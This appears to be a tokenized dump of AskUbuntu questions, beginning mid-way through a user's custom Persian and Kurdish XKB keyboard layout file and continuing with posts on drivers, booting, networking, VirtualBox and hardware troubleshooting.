arabic_hamza , ellipsis ] } ; // 1 : arabic_peh key < ab08 > { [ arabic_waw , greater , comma ] } ; key < ab09 > { [ period , less , apostrophe ] } ; key < ab10 > { [ slash , arabic_question_mark , question ] } ; key < tlde > { [ 0x100200d , division , asciitilde ] } ; key < ae11 > { [ minus , arabic_tatweel , underscore ] } ; key < ae12 > { [ equal , plus , 0x1002212 ] } ; key < bksl > { [ arabic_peh , bar , 0x1002010 ] } ; // 1 : backslash } ; partial hidden alphanumeric_keys xkb_symbols `` pes_part_ext '' { // persian and ascii digits key < ae01 > { [ 0x10006f1 , exclam , grave , 1 ] } ; key < ae02 > { [ 0x10006f2 , 0x100066c , at , 2 ] } ; key < ae03 > { [ 0x10006f3 , 0x100066b , numbersign , 3 ] } ; key < ae04 > { [ 0x10006f4 , 0x100fdfc , dollar , 4 ] } ; key < ae05 > { [ 0x10006f5 , 0x100066a , percent , 5 ] } ; key < ae06 > { [ 0x10006f6 , multiply , asciicircum , 6 ] } ; key < ae07 > { [ 0x10006f7 , arabic_comma , ampersand , 7 ] } ; key < ae08 > { [ 0x10006f8 , asterisk , enfilledcircbullet , 8 ] } ; key < ae09 > { [ 0x10006f9 , parenright , 0x100200e , 9 ] } ; key < ae10 > { [ 0x10006f0 , parenleft , 0x100200f , 0 ] } ; } ; partial hidden alphanumeric_keys xkb_symbols `` pes_part_keypad '' { // persian digits and mathematical operators key < kpdv > { [ division , xf86_ungrab ] } ; key < kpmu > { [ multiply , xf86_cleargrab ] } ; key < kpsu > { [ 0x1002212 , xf86_prev_vmode ] } ; key < kpad > { [ plus , xf86_next_vmode ] } ; key < kpen > { [ kp_enter ] } ; key < kpeq > { [ equal ] } ; key < kp7 > { [ kp_home , 0x10006f7 ] } ; key < kp8 > { [ kp_up , 0x10006f8 ] } ; key < kp9 > { [ kp_prior , 0x10006f9 ] } ; key < kp4 > { [ kp_left , 0x10006f4 ] } ; key < kp5 > { [ kp_begin , 0x10006f5 ] } ; key < kp6 > { [ kp_right , 0x10006f6 ] } ; key < kp1 > { [ kp_end , 0x10006f1 ] } ; key < kp2 > { [ kp_down , 0x10006f2 ] } ; key < kp3 > { [ kp_next , 0x10006f3 ] } ; key < kp0 > { [ kp_insert , 0x10006f0 ] } ; key < kpdl > { [ kp_delete , 0x100066b ] } ; } ; //////////////////////////////////////// // kurdish layout partial alphanumeric_keys xkb_symbols `` ku '' { include `` tr ( ku ) '' name [ group1 ] = `` kurdish ( iran , latin q ) '' ; } ; partial alphanumeric_keys xkb_symbols `` ku_f '' { include `` tr ( ku_f ) '' name [ group1 ] = `` kurdish ( iran , f ) '' ; } ; partial alphanumeric_keys xkb_symbols `` ku_alt '' { include `` tr ( ku_alt ) '' name [ group1 ] = `` kurdish ( iran , latin alt-q ) '' ; } ; //////////////////////////////////////// // kurdish soranî bahdînî ( arabic ) keyboard layout , // based on the kurdî soranî bahdînî keyboard from kurditgroup // which is based on national iranian keyboard standard ( isiri 2901:1994 ) , // with additions . // // copyright ( c ) 2006 erdal ronahî , published under the gpl v2 // // special copyright note : author explicitly permitted to license this // layout under mit/x11 license , for details see // https : //bugs.freedesktop.org/show_bug.cgi ? id=9541 // // author : erdal ronahî < erdal.ronahi @ gmail.com > // // kurdish arabic-latin layout for soranî partial alphanumeric_keys xkb_symbols `` ku_ara '' { name [ group1 ] = `` kurdish ( iran , arabic-latin ) '' ; // other 3-level symbols key < tlde > { [ 0x100200d , division , asciitilde ] } ; key < bksl > { [ backslash , bar , ccedilla , ccedilla ] } ; // digits key < ae01 > { [ 1 , exclam , 0x10006f1 , grave ] } ; key < ae02 > { [ 2 , at , 0x10006f2 , at ] } ; key < ae03 > { [ 3 , numbersign , 0x10006f3 , 0x100066b ] } ; key < ae04 > { [ 4 , dollar , 0x10006f4 , 0x100fdfc ] } ; key < ae05 > { [ 5 , percent , 0x10006f5 , 0x100066a ] } ; key < ae06 > { [ 6 , asciicircum , 0x10006f6 , multiply ] } ; key < ae07 > { [ 7 , ampersand , 0x10006f7 , arabic_comma ] } ; key < ae08 > { [ 8 , asterisk , 0x10006f8 , enfilledcircbullet ] } ; key < ae09 > { [ 9 , parenright , 0x10006f9 , 0x100200e ] } ; key < ae10 > { [ 0 , parenleft , 0x10006f0 , 0x100200f ] } ; key < ae11 > { [ minus , arabic_tatweel , underscore ] } ; key < ae12 > { [ equal , plus , 0x1002212 ] } ; key < ad01 > { [ arabic_qaf , x , q , q ] } ; key < ad02 > { [ arabic_waw , x , w , w ] } ; key < ad03 > { [ 0x10006d5 , arabic_heh , e , e ] } ; key < ad04 > { [ arabic_ra , 0x1000695 , r , r ] } ; key < ad05 > { [ arabic_teh , arabic_tah , t , t ] } ; key < ad06 > { [ 0x10006cc , 0x10006ce , y , y ] } ; key < ad07 > { [ arabic_hamzaonyeh , arabic_hamza , u , u ] } ; key < ad08 > { [ arabic_hah , arabic_ain , i , i ] } ; key < ad09 > { [ 0x10006c6 , arabic_hamzaonwaw , o , o ] } ; key < ad10 > { [ 0x100067e , arabic_theh , p , p ] } ; key < ad11 > { [ bracketright , braceright , ucircumflex , ucircumflex ] } ; key < ad12 > { [ bracketleft , braceleft , scedilla , scedilla ] } ; key < ac01 > { [ arabic_alef , arabic_maddaonalef , a , a ] } ; key < ac02 > { [ arabic_seen , arabic_sheen , s , s ] } ; key < ac03 > { [ arabic_dal , arabic_thal , d , d ] } ; key < ac04 > { [ arabic_feh , arabic_hamzaunderalef , f , f ] } ; key < ac05 > { [ 0x10006af , arabic_ghain , g , g ] } ; key < ac06 > { [ arabic_heh , 0x100200c , h , h ] } ; key < ac07 > { [ 0x1000698 , arabic_hamzaonalef , j , j ] } ; key < ac08 > { [ 0x10006a9 , arabic_kaf , k , k ] } ; key < ac09 > { [ arabic_lam , 0x10006b5 , l , l ] } ; key < ac10 > { [ arabic_semicolon , colon , ecircumflex , ecircumflex ] } ; key < ac11 > { [ apostrophe , quotedbl , icircumflex , icircumflex ] } ; key < ab01 > { [ arabic_zain , arabic_dad , z , z ] } ; key < ab02 > { [ arabic_khah , arabic_sad , x , x ] } ; key < ab03 > { [ arabic_jeem , 0x1000686 , c , c ] } ; key < ab04 > { [ 0x10006a4 , arabic_zah , v , v ] } ; key < ab05 > { [ arabic_beh , 0x1000649 , b , b ] } ; key < ab06 > { [ arabic_noon , arabic_tehmarbuta , n , n ] } ; key < ab07 > { [ arabic_meem , arabic_tatweel , m , m ] } ; key < ab08 > { [ arabic_comma , greater , comma ] } ; key < ab09 > { [ period , less , apostrophe ] } ; key < ab10 > { [ slash , arabic_question_mark , question ] } ; include `` nbsp ( zwnj2nb3 ) '' include `` level3 ( ralt_switch ) '' } ; // extras : ///////////////////////////////////////////////////////////////////////////////// // // generated keyboard layout file with the keyboard layout editor . // for more about the software , see http : //code.google.com/p/keyboardlayouteditor // // version 0.2 , fixed ad09 . // // layout by ernst tremel , http : //ubuntuforums.org/showpost.php ? p=9365469 & postcount=32 // creation of this file by simos xenitellis . partial alphanumeric_keys xkb_symbols `` ave '' { name [ group1 ] = `` avestan '' ; key < ab01 > { [ u10b30 , u10b32 ] } ; // key < ab02 > { [ u10b11 , u10b12 ] } ; // key < ab03 > { [ u10b17 , ue102 ] } ; //  key < ab04 > { [ u10b2c , u10b13 ] } ; // key < ab05 > { [ u10b20 , u10b21 ] } ; // key < ab06 > { [ u10b25 , u10b27 ] } ; // key < ab07 > { [ u10b28 , u10b29 ] } ; // key < ab08 > { [ u10b3c , u10b39 ] } ; // key < ab09 > { [ u10b3e , u10b3d ] } ; // key < ab10 > { [ u10b3f , periodcentered ] } ; // · key < ac01 > { [ u10b00 , u10b01 ] } ; // key < ac02 > { [ u10b2f , u10b31 ] } ; // key < ac03 > { [ u10b1b , u10b1c ] } ; // key < ac04 > { [ u10b1f , u10b16 ] } ; // key < ac05 > { [ u10b14 , u10b15 ] } ; // key < ac06 > { [ u10b35 , ue100 ] } ; //  key < ac07 > { [ u10b18 , u10b24 ] } ; // key < ac08 > { [ u10b10 , ue101 ] } ; //  key < ac09 > { [ u10b2e , ue103 ] } ; //  key < ac10 > { [ u10b3b , u10b3a ] } ; // key < ac11 > { [ u10b1d ] } ; // key < ad01 > { [ u10b22 , u10b23 ] } ; // key < ad02 > { [ u10b33 , u10b34 ] } ; // key < ad03 > { [ u10b08 , u10b09 ] } ; // key < ad04 > { [ u10b2d , u10b26 ] } ; // key < ad05 > { [ u10b19 , u10b1a ] } ; // key < ad06 > { [ u10b2b , u10b2a ] } ; // key < ad07 > { [ u10b0e , u10b0f ] } ; // key < ad08 > { [ u10b0c , u10b0d ] } ; // key < ad09 > { [ u10b0a , u10b0b ] } ; // key < ad10 > { [ u10b1e ] } ; // key < ad11 > { [ u10b06 , u10b07 ] } ; // key < ad12 > { [ u10b02 , u10b03 ] } ; // key < ae01 > { [ u10b78 ] } ; // key < ae02 > { [ u10b79 ] } ; // key < ae03 > { [ u10b7a ] } ; // key < ae04 > { [ u10b7b ] } ; // key < ae05 > { [ u10b7c ] } ; // key < ae06 > { [ u10b7d ] } ; // key < ae07 > { [ u10b7e ] } ; // key < ae08 > { [ u10b7f ] } ; // key < bksl > { [ u10b04 , u10b05 ] } ; // key < lsgt > { [ u10b04 , u10b05 ] } ; // } ; part of /usr/share/x11/xkb/rules/evdev.xml containing all modifications : ... < layout > < configitem > < name > ir < /name > < shortdescription > fa < /shortdescription > < description > persian < /description > < languagelist > < iso639id > per < /iso639id > < /languagelist > < /configitem > < variantlist > < variant > < configitem > < name > pes_keypad < /name > < description > persian ( with persian keypad ) < /description > < /configitem > < /variant > < variant > < configitem > < name > ku < /name > < shortdescription > ku < /shortdescription > < description > kurdish ( iran , latin q ) < /description > < languagelist > < iso639id > kur < /iso639id > < /languagelist > < /configitem > < /variant > < variant > < configitem > < name > ku_f < /name > < shortdescription > ku < /shortdescription > < description > kurdish ( iran , f ) < /description > < languagelist > < iso639id > kur < /iso639id > < /languagelist > < /configitem > < /variant > < variant > < configitem > < name > ku_alt < /name > < shortdescription > ku < /shortdescription > < description > kurdish ( iran , latin alt-q ) < /description > < languagelist > < iso639id > kur < /iso639id > < /languagelist > < /configitem > < /variant > < variant > < configitem > < name > ku_ara < /name > < shortdescription > ku < /shortdescription > < description > kurdish ( iran , arabic-latin ) < /description > < languagelist > < iso639id > kur < /iso639id > < /languagelist > < /configitem > < /variant > < /variantlist > < /layout > < layout > < configitem > < name > irwinxp < /name > < shortdescription > fa < /shortdescription > < description > persian-winxp < /description > < languagelist > < iso639id > per < /iso639id > < /languagelist > < /configitem > < variantlist > < variant > < configitem > < name > pes_keypad < /name > < description > persian ( with persian keypad ) < /description > < /configitem > < /variant > < variant > < configitem > < name > ku < /name > < shortdescription > ku < /shortdescription > < description > kurdish ( iran , latin q ) < /description > < languagelist > < iso639id > kur < /iso639id > < /languagelist > < /configitem > < /variant > < variant > < configitem > < name > ku_f < /name > < shortdescription > ku < /shortdescription > < description > kurdish ( iran , f ) < /description > < languagelist > < iso639id > kur < /iso639id > < /languagelist > < /configitem > < /variant > < variant > < configitem > < name > ku_alt < /name > < shortdescription > ku < /shortdescription > < description > kurdish ( iran , latin alt-q ) < /description > < languagelist > < iso639id > kur < /iso639id > < /languagelist > < /configitem > < /variant > < variant > < configitem > < name > ku_ara < /name > < shortdescription > ku < /shortdescription > < description > kurdish ( iran , arabic-latin ) < /description > < languagelist > < iso639id > kur < /iso639id > < /languagelist > < /configitem > < /variant > < /variantlist > < /layout > < layout > < configitem > < name > iq < /name > ... but now , with these changes the new persian-winxp layout does not obey irwinxp and irwinxp is igored . instead ir controls persian-winxp . update # 2 : unity has a problem with my new layout . the new layout icon is dark . but it works well . note : i use ubuntu 14.04 .
482679	could i have my slept ubuntu waking up at certain time ?	i can have my ubuntu desktop sleep , no problem . i can wake it up by pressing keyboard , no problem . now i want it to wake up at certain time . for example i issue sleep command before i left work , and it will be up the next day when i arrive office . is this possible ?
482682	hello phpmyadmin error	i 'm trying to access my server locally . i get an error ( incorrect permissions on the configuration file either should not be able to modify it ! ) . has someone see this before and how do set this up ?
482684	is there a way to refuse a dhcp response from a specific ip ?	on my network i have two dhcp servers ( not my fault ) . is there a way to refuse a dhcp response coming from a specific dhcp server ?
482686	ubuntu cpu fan at 2200 rpm and cpu top at 90°c	i have a problem with my cpu heat . i 'm running ubuntu 14.04 ( 64bit ) and i have issues with the cooling . i know it might be a hardware issue , but i 've checked , the fan is running and in my gui i use the command `` sensors '' which shows me a rpm of 2200 and a cpu temperature of 60°c while i 'm not running any software . this seems to be really mysterious . however , if i start my ide ( eclipse ) , firefox and chromium at the same time , the cpu temp goes up to 75-90° celsius . i doubt that this is common for a system with 16 gb ram , an i7 processor and an intel water cooling system and i also never had some issues like this before when i was running ubuntu 12.04 or 13.04 . fan speed at 60°c it 's at 1300 rpm , and after start up eclipse and firefox it 's at approximately 2200 rpm and between 75°c - 90°c depending on how many windows and ide 's i 've opened . if i use the `` top '' command , there are just few processes like xorg or compiz which are taking up to 10 % cpu usage at maximum , during the time i 'm not running any software . i have tried to upgrade the linux kernel , where i failed . after upgrading , i was n't able to boot anymore so i tried to remove the new kernel from the boot directory and updated my grub file to an old entry , which works fine now , but still with the temperature issue . my nvidia drivers is also up to date , which dropped some issues i had before with the cpu load . so it ca n't be a problem with the graphic card . how can i find out , where the problem is , or why my cpu gets that high temperatures , which i only should get while playing games with high end graphics and so on ? did anyone have some similar issues before ?
482687	know whether the shell script contains syntax error without running the script	i have a long shell script containing a lot of conditions and i want to know whether there is any syntax error in the script without running it . since shell script is interpreted i think it is not possible but is there a way to know by using some trick .
482688	how to improve battery life on samsung 13.3” series 7 ultra ( np730u3e-s01au ) ?	recently i 've bought a series 7 ultra samsung ultrabook and decided to change the os from originally installed windows 8 to ubuntu 14.04lts . however , it 's difficult not to notice great decrease in battery life : on pre-installed windows 8 battery would last for about 6 hours while on ubuntu it 's almost empty after 2 hours of same kind of work ( wi-fi , web , vlc , spotify , intellij idea ) . i 'm not here to say that ubuntu 's battery performance is worse than windows , but to ask for suggestions how to improve the situation ( 2 hours of work is pretty poor battery life ) . can you recommend some sources , applications or tips/tricks that would improve battery life on my ultrabook ? i really like the ubuntu experience , but this makes my machine much less reliable . i suspect that graphic video card might be one of the issues here . let me give you tech specs of the ultrabook : processor : intel® core™ i5 processor 3337u ( 1.80ghz , 3mb l3 cache ) chipset : intel hm76 graphic : amd radeon™ hd 8570m graphics with 1gb gddr3 graphic memory ( powerexpress ) and intel ( r ) hd graphics 4000 display : 13.3 '' superbright+ 350nit fhd led display ( 1920 x 1080 ) , anti-reflective memory : 10gb ddr3 system memory at 1,600mhz hard-drive : 128gb solid-state drive more informations here , on the official page . if it 's helpful to provide additional info , i 'm happy to do it , just let me know what you need . thank you .
482689	ps3 controller failed to pair	i 'm trying to pair my ps3 controller with trusty . i 've tried this so far : $ sudo sixpair current bluetooth master : xx : xx : xx : xx : xx : xx setting master bd_addr to xx : xx : xx : xx : xx : xx and then i unplug my controller and run this command : $ sixad -- start d-bus setup failed : name already in use sixad-bin [ 4843 ] : started sixad-bin [ 4843 ] : sixad started , press the ps button now but when i press the ps button , nothing happens ! i 've searched a lot in google and this process works everywhere , but i do n't know it does n't work here ... thanks for your help ...
482691	monit fails to start/stop httpd	i have done a monit httpd check . the problem is that once monit is run it will stop httpd but httpd workers will still be running . i have tried to change stop command /etc/init.d/httpd stop to /usr/sbin/httpd -k stop , but it does stop the httpd but workers will still be running . once i kill httpd workers via kill command ( ps aux ) then i can start the httpd again . has anyone seens something like this ?
482692	issues with asus s301l ultrabooks	i just like to tell you what still is a problem in ubuntu 14.04 and should be solved for a nice experience of this distribution . intel open source graphics issues ( proprietary ) when attaching hdmi-cable the screen switches to the external monitor and it 's fine , but there is no switching back unless restart with hdmi detached black screen appears for like 2 seconds as if i would change screen in the settings ; frequency increases with intensity of driver use ( i.e . videos or video games ) hotkeys ( commonly recognised ) there is no possibility to adjust brightness with the hotkeys ( fn+f5 and fn+f6 ) touchscreen ( commonly recognised ) the touchscreen is behaving like a mouse configuring gestures for the multi touch screen seems to always end in disabling touch pad gestures panel symbols battery symbol has got a low accuracy while it determines accurately the energy left ; only 5 steps of energy are shown by the symbol . thank you all for participating in the solution of these problems ! i will stay tuned and edit this list if something has been solved .
482693	ubuntu 13.04 is showing some error while opening my computer	few months before when i was using ubuntu 12.04 then i found some errors while starting my computer . due to this problem i had given my cpu to a shop to repair it i do n't know what he has done to my cpu but i only know that finally i got my cpu with ubuntu 13.04 . the technician was unable to make any partition and i also think that he had installed 13.04 over 12.04 and so now my computer is showing some error when i 'm starting my computer the error is as follows : error : attempt to read or write outside of the disk 'hd0 ' . grub rescue > _ before showing this error , few times my computer was working very slow . so kindly someone tell me that is there any way by which i can start my computer . please also tell me that what things i have to keep in mind while using ubuntu so that in future i find no difficulties ( errors ) while using ubuntu .
482696	getting time in ubuntu	# include < sys/time.h > # include < stdio.h > int gettime ( ) { struct timespec tsp ; clock_gettime ( clock_realtime , & tsp ) ; //call clock_gettime to fill tsp fprintf ( stdout , `` time= % d. % d\n '' , tsp.tv_sec , tsp.tv_nsec ) ; fflush ( stdout ) ; } i am trying to compile the above code but it keeps throwing the error : time.c : in function ‘gettime’ : time.c:12:4 : warning : implicit declaration of function ‘clock_gettime’ [ -wimplicit-function-declaration ] time.c:12:18 : error : ‘clock_realtime’ undeclared ( first use in this function ) time.c:12:18 : note : each undeclared identifier is reported only once for each function it appears in time.c:14:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘__time_t’ [ -wformat ] time.c:14:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 4 has type ‘long int’ [ -wformat ] i have tried compiling with -lrt flag and -std=gnu99 . nothing works .
482698	ca n't boot windows 7 cd installer after installing ubuntu boot-repair failed	following error occurred during the repair . please write on a paper the following url : http : //paste.ubuntu.com/7638031/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com you can now reboot your computer . the boot files of [ the os now in use - ubuntu 14.04 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition i really do n't know what to do..please help : (
482700	how to configure wifi in lenovo g50-70	i have lenovo g50-70 model laptop i have installed ubuntu 14.04 lts wired network is working but wifi not how do i get wifi network ?
482701	change behavior of network/internet icon in ubuntu	internet icon in ubuntu desktop just check connect to the modem or network but it do n't check connection to the internet i want to change it 's behavior to check both of them . something like network connection icon in win7 ! where is it 's source code ? how can i change it ? thanks
482702	ubuntu /home folder bigger than its size	i dual boot windows and ubuntu 14.04 and my /home directory has 1763 items totalling 106.9 gb while the partition mounted at /home is only 38 gb . i am quite new to ubuntu , so if possible i do want to know how to extend my home folder as well , thanks for the help . : )
482713	ubuntu booting error	i installed windows 7 64bit version to my desktop and next i tried to install ubuntu ! but when installing ubuntu installer did n't recognize any operating system on my computer ! what should i do ? ?
482714	need to know what ubuntu version that i can use	i 'm having a desktop pc with following configurations , pentium 4 2.26ghz processor,768 mb ram , ... .what is the latest version of ubuntu that i can use in my machine ... thanks and please help
482715	where does the discrepancy between \ # in ps1 and n in ! n come from ?	something has been gnawing at me for a while now and i ca n't seem to find a relevant answer either in man pages or using your 'do n't be evil ' search engine . my .bashrc has the following : shopt -s histappend histsize=100 histfilesize=0 # 200 previous value putting histfilesize to 0 allows me to start with a clean history slate with each new term window . i find it practical in conjunction with using a prompt that contains \ # , because when visualizing a previous command before recalling it with ! n or ! -p , one can just do : $ history | more to see its relevant `` n '' value in my case , usually the result of : $ \history | tail -1 | awk ' { print $ 1 } ' # ( i know this is an overkill , do n't flame me ) equals the expanded value of # in ps1 minus 1 , which is how i like it to be at all times . but then , sometimes not . at times the expanded value of # sort of `` runs away '' . it 's incremented in such a a manner that it becomes > than $ ( ( $ ( \history | tail -1 | awk ' { print $ 1 } ' ) +1 ) ) any pointers , anyone ?
482716	access application and folders located in host from the guest machine	i 'm totally new to use virtual box and ubuntu and i have question regarding access files and application that installed in the host machine . my host machine os is windows 7 and the guest machine is ubuntu . i have installed xampp and need use it to develop a web application . my question are : how can i copy my application folder to guest xampp/htdocs ? how can i access netbeans that installed in my windows host from my ubuntu guest ? how to share folder ? i added a shared folder by changing setting of virtual machine , but when i tried to access it in the guest i could n't find the folder that i shared in media folder . please can anyone help me ? ? thanks in advance : )
482718	virtualbox headless : why ca n't i get the guestproperty network address ?	i have installed ubuntu desktop 14.04 ( trusty ) on a virtualbox client ( bridged network connection , guest additions installed ) . i sometimes run the client in headless mode ( rather than through the virtualbox gui ) and access it via ssh . to start such a client and get its network address , i normally : nohup vboxheadless -- startvm < vm_name > & # start as background process # wait a bit for it to start up vboxmanage guestproperty get < vm_name > `` /virtualbox/guestinfo/net/0/v4/ip '' this works for most clients ( debian , windows , i do n't remember if it worked for my ubuntu 13.10 client ) . if this fails , i can request all details , but even here the network address does n't come up . vboxmanage guestproperty enumerate < vm_name > my guestproperties for the 14.04 client are as follows : name : /virtualbox/guestinfo/os/product , value : linux , timestamp : 1402485749624026000 , flags : name : /virtualbox/hostinfo/gui/languageid , value : en_us , timestamp : 1402652779530499000 , flags : name : /virtualbox/hostinfo/vboxverext , value : 4.3.12 , timestamp : 1402652779119725000 , flags : transient , rdonlyguest name : /virtualbox/guestadd/vbgl/video/savedmode , value : 1366x722x32 , timestamp : 1402485750186131000 , flags : name : /virtualbox/guestinfo/os/version , value : # 53-ubuntu smp wed jun 4 21:02:19 utc 2014 , timestamp : 1402485749625558000 , flags : name : /virtualbox/guestadd/versionext , value : 4.3.12 , timestamp : 1402485749627827000 , flags : name : /virtualbox/guestadd/revision , value : 93733 , timestamp : 1402485749628338000 , flags : name : /virtualbox/hostguest/sysprepexec , value : , timestamp : 1402652779118360000 , flags : transient , rdonlyguest name : /virtualbox/hostguest/sysprepargs , value : , timestamp : 1402652779118595000 , flags : transient , rdonlyguest name : /virtualbox/guestadd/version , value : 4.3.12 , timestamp : 1402485749627214000 , flags : name : /virtualbox/hostinfo/vboxrev , value : 93733 , timestamp : 1402652779119840000 , flags : transient , rdonlyguest name : /virtualbox/hostinfo/vboxver , value : 4.3.12 , timestamp : 1402652779119633000 , flags : transient , rdonlyguest name : /virtualbox/guestinfo/os/release , value : 3.13.0-29-generic , timestamp : 1402485749624971000 , flags : name : /virtualbox/guestadd/hostverlastchecked , value : 4.3.12 , timestamp : 1402485781945719000 , flags : my workaround is to start the client with the vbox gui , log in and type ifconfig to get the address , shut it down , and start it again headless , but i 'd prefer to avoid that . how can i get the network address from a headless trusty virtualbox client ?
482720	why does n't 'cp /user/local ' work ?	i was trying to copy a directory to /user/bin ( on ubuntu 12.04 ) . i tells me that i can not create directory `` /user/local ' no such file or directory` . where did i make a mistake ? sudo cp -r apache-maven /user/local/ cp : can not create directory `/user/local ' : no such file or directory
482721	execute script with sudo after login	i need to execute the following commands after login . sudo hdparm -y /dev/disk/by-uuid/443afbad7fe50945 sudo hdparm -y /dev/disk/by-uuid/7abb49654b799d40 ( trying to edit rc.local does not work nor does using hdparm.conf because as soon as i log in the disks start up again ) . i have tried numerous things like bash files and autossh entries in the startup applications with no luck because sudo is involved . i have tried the rc.local , the .bashrc , the autossh in startup , hdparm.conf . none of these options have worked
482731	no unity dash and bars - existing solutions not working	i am running ubuntu 14.04 lts x64 on a schenker m504 ( clevo 650 ) intel i7 4712 with nvidia geforce gtx850m . when switching to the nvidia card using prime , all my windows were surrounded by a thick black border . in an attempt to solve this issue i attempted to update the nvidia driver from 331.38 to 337.25 following the guide from dannyboy79 - nvidia releases 337.25 . i then rebooted only to find a black screen with a white cursor on the top left . i attempted various things to solve this , including : 1 ) removing all nvidia drivers ( solution 1 ) : sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install unity sudo apt-get purge nvidia* bumblebee* sudo apt-get install nvidia-prime sudo shutdown -r 2 ) purging and resinstalling everything : remove everything to do with the nvidia proprietary drivers . sudo nvidia-settings -- uninstall sudo apt-get remove -- purge nvidia* start from scratch . sudo apt-get remove -- purge xserver-xorg-video-nouveau xserver-xorg-video-nv reinstall all the things ! sudo apt-get install nvidia-common sudo apt-get install xserver-xorg-video-nouveau sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core reconfigure the x server . sudo dpkg-reconfigure xserver-xorg reinstall compiz sudo apt-get install -- reinstall compiz option 2 ) solved the issue but i now find myself with a blank unity background . i have seen several people mentioning that the unity plugin was disabled in ccsm . i have therefore followed all the solutions mentionned on unity does n't load , no launcher , no dash appears , but to no avail . running ccsm is mentioned in several potential answers , but everytime i try to launch ccsm , i get an error message : /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:57 : gtkwarning : could not open display warnings.warn ( str ( e ) , _gtk.warning ) traceback ( most recent call last ) : file '' /usr/lib/python2.7/dist-packages/ccm/__init__.py '' , line 1 , in < module > from ccm.conflicts import * file '' /usr/lib/python2.7/dist-packages/ccm/conflicts.py '' , line 26 , in < module > from ccm.constants import * file '' /usr/lib/python2.7/dist-packages/ccm/constants.py '' , line 30 , in < module > currentscreennum = gtk.gdk.display_get_default ( ) .get_default_screen ( ) .get_number ( ) attributeerror : 'nonetype ' object has no attribute 'get_default_screen' when i try to run : dconf reset -f /org/compiz/ i get an error message : can not autolaunch d-bus without x11 $ display . similarly setsid unity does not work either . i have also attempted to reinstall lightdm , but the problem remains , and when attempting to boot using gdm ubuntu just hangs at the loading display . the problem is present on both my host and guest sessions . any ideas ? thanks !
482733	ubuntu 14.04 stuck after login	i installed ubuntu 14.04 last night on my lenovo x200 , dual core 2.4ghz 3gb ram and 250gb hdd . everything was working fine , and this morning when i powered it up to double check everything , it was all good . i came into work and all booted up fine . however , when i tried to login ( password protected user ) ; only user on the computer - it logged in fine but was stuck straight away , with the blank screen ( the background of the login screen ) and just my cursor . nothing else . i left it for a few minutes thinking it was just being a little slow , but to no avail nothing happened . i have tried a reboot and nothing happened .
482734	yelp package building problem	i 'm using ubuntu12.04 lts . when i built the yelp package from it 's source with dpkg-buildpackage command , it shows me following message , and it fall a sleep . gtk-doc : scanning header files ( process:30532 ) : gtk-critical ** : gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed what happened ? how do i solve this problem ?
482735	ubuntu gnome cant find wired connection	i have been studying linux and centos for some time now and figured i am going to try installing a server with some kind of linux distribution . my friend told me that centos is not good , so i figured i could try something new , he recommended ubuntu . i have installed ubuntu gnome and ubuntu i am now going to try to install ubuntu server but i get same problem - the wired connection is not working . i 've read on forums the last 4 days and i just cant , i give up , i cant do it myself . i need help . i read these commands are good and supply a lot of information for troubleshooting : root @ gusserver : / # cat /etc/network/interfaces interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback root @ gusserver : / # cat /etc/networkmanager/nm-system-settings.conf cat : /etc/networkmanager/nm-system-settings.conf : no such file or directory root @ gusserver : / # ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:159 errors:0 dropped:0 overruns:0 frame:0 tx packets:159 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:11263 ( 11.2 kb ) tx bytes:11263 ( 11.2 kb ) root @ gusserver : / # lspci 00:00.0 host bridge : intel corporation 4th gen core processor dram controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 04 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation 8 series/c220 series chipset family kt controller ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d4 ) 00:1c.2 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 3 ( rev d4 ) 00:1c.3 pci bridge : intel corporation 82801 pci bridge ( rev d4 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation b85 express lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 04 ) 03:00.0 pci bridge : intel corporation 82801 pci bridge ( rev 41 ) all i want to do is just have a http and ftp-server , distribution doesnt matter i just need a linux-based os that can work ... .
482737	ubuntu touch trojita	trojita client develop is working on 14.04 desktop . my touch device is 14.10 r80 . how do i install a click package on my touch device .
482738	getting error in opening py file	i 'm installing a software in ubuntu 12.04 and got the following error : http : //paste.ubuntu.com/7638369/ server @ ubuntu : ~/desktop/revkit-1.3 $ ./tools/gui/gui.py traceback ( most recent call last ) : file `` ./tools/gui/gui.py '' , line 143 , in < module > w = mainwindow ( ) file `` ./tools/gui/gui.py '' , line 73 , in __init__ self.setuptools ( ) file `` ./tools/gui/gui.py '' , line 102 , in setuptools import items.unstable importerror : no module named unstable server @ ubuntu : ~/desktop/revkit-1.3 $ how to fix this error ?
